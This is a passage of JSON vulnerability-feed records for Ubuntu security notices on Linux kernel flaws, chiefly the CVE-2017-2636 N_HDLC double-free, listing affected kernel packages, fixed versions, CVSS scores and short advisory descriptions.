"OSVersion": "16.04", "packageVersion": "4.4.0-1007.16", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-1007-aws", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0.1007.8", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-aws", "operator": "lt"}], "description": "USN-3220-1 fixed a vulnerability in the Linux kernel. This update provides the corresponding updates for the Linux kernel for Amazon Web Services (AWS).\n\nAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-09T00:00:00", "title": "Linux kernel (AWS) vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-09T00:00:00", "id": "USN-3220-3", "href": "https://usn.ubuntu.com/3220-3/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:50", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636", "https://usn.ubuntu.com/usn/usn-3221-1"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0.41.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-hwe-16.04", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0-41.44~16.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0-41.44~16.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0-41.44~16.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0-41.44~16.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0.41.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lpae-hwe-16.04", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0-41.44~16.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0-41.44~16.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.8.0.41.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-lowlatency-hwe-16.04", "operator": "lt"}], "description": "USN-3221-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.10. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.10 for Ubuntu 16.04 LTS.\n\nAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. (CVE-2017-2636)", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-08T00:00:00", "title": "Linux kernel (HWE) vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-08T00:00:00", "id": "USN-3221-2", "href": "https://usn.ubuntu.com/3221-2/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:45", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-124.167", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-124-highbank", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-highbank - 3.2.0.124.139", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-omap4 - 3.2.0.1502.97", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-1502.129", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-1502-omap4", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-124.167", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-124-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-124.167", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-124-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-124.167", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-124-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-124.167", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-124-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-124.167", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-124-omap", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-124.167", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-124-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-pae - 3.2.0.124.139", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-omap - 3.2.0.124.139", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic - 3.2.0.124.139", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-virtual - 3.2.0.124.139", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-smp - 3.2.0.124.139", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-smp - 3.2.0.124.139", "operator": "lt"}], "description": "Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-07T00:00:00", "title": "Linux kernel vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-07T00:00:00", "id": "USN-3218-1", "href": "https://usn.ubuntu.com/3218-1/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:10", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-41.44", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-lowlatency - 4.8.0.41.52", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-e500mc - 4.8.0.41.52", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-41.44", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lpae - 4.8.0.41.52", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-41.44", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-smp - 4.8.0.41.52", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-41.44", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-raspi2 - 4.8.0.1028.31", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-41.44", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic - 4.8.0.41.52", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-1028.31", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-1028-raspi2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-emb - 4.8.0.41.52", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-41.44", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-41-powerpc64-emb", "operator": "lt"}], "description": "Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-08T00:00:00", "title": "Linux kernel vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-08T00:00:00", "id": "USN-3221-1", "href": "https://usn.ubuntu.com/3221-1/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:22", "references": ["https://usn.ubuntu.com/usn/usn-3219-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0.112.103", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lpae-lts-trusty", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0.112.103", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lts-trusty", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0-112.159~precise1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.13.0-112.159~precise1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-generic", "operator": "lt"}], "description": "USN-3219-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 LTS.\n\nAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-08T00:00:00", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-08T00:00:00", "id": "USN-3219-2", "href": "https://usn.ubuntu.com/3219-2/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:33", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-powerpc-e500", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-e500", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0.112.120", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "3.13.0-112.159", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.13.0-112-powerpc64-smp", "operator": "lt"}], "description": "Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-07T00:00:00", "title": "Linux kernel vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-07T00:00:00", "id": "USN-3219-1", "href": "https://usn.ubuntu.com/3219-1/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:36", "references": ["https://usn.ubuntu.com/usn/usn-3220-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0.66.52", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-lowlatency-lts-xenial", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-66.87~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0.66.52", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lts-xenial", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-66.87~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-66.87~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-66.87~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0.66.52", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-smp-lts-xenial", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0.66.52", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lpae-lts-xenial", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0.66.52", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-emb-lts-xenial", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0.66.52", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-e500mc-lts-xenial", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-66.87~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-66.87~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0-66.87~14.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "4.4.0.66.52", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-smp-lts-xenial", "operator": "lt"}], "description": "USN-3220-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-08T00:00:00", "title": "Linux kernel (Xenial HWE) vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-08T00:00:00", "id": "USN-3220-2", "href": "https://usn.ubuntu.com/3220-2/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:40", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-66.87", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-66.87", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-e500mc - 4.4.0.66.70", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-raspi2 - 4.4.0.1046.45", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-1046.53", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-1046-raspi2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-66.87", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-emb - 4.4.0.66.70", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-smp - 4.4.0.66.70", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-66.87", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-1005.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-1005-gke", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-gke - 4.4.0.1005.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-smp - 4.4.0.66.70", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-1050.54", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-1050-snapdragon", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-lowlatency - 4.4.0.66.70", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-66.87", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-snapdragon - 4.4.0.1050.42", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-66.87", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "4.4.0-66.87", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-66-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lpae - 4.4.0.66.70", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic - 4.4.0.66.70", "operator": "lt"}], "description": "Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2017-03-08T00:00:00", "title": "Linux kernel vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-03-08T00:00:00", "id": "USN-3220-1", "href": "https://usn.ubuntu.com/3220-1/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:55", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-9793", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-9756"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0.34.43", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0.34.43", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0.34.43", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-lowlatency", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0.34.43", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0.34.43", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0.34.43", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-34.36", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-34-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-34.36", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-34-generic-lpae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-34.36", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-34-powerpc-e500mc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-34.36", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-34-powerpc64-emb", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-34.36", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-34-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.10", "packageVersion": "4.8.0-34.36", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.8.0-34-lowlatency", "operator": "lt"}], "description": "Dmitry Vyukov discovered that the KVM implementation in the Linux kernel did not properly initialize the Code Segment (CS) in certain error cases. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2016-9756)\n\nAndrey Konovalov discovered that signed integer overflows existed in the setsockopt() system call when handling the SO_SNDBUFFORCE and SO_RCVBUFFORCE options. A local attacker with the CAP_NET_ADMIN capability could use this to cause a denial of service (system crash or memory corruption). (CVE-2016-9793)", "edition": 3, "reporter": "Ubuntu", "published": "2017-01-11T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": 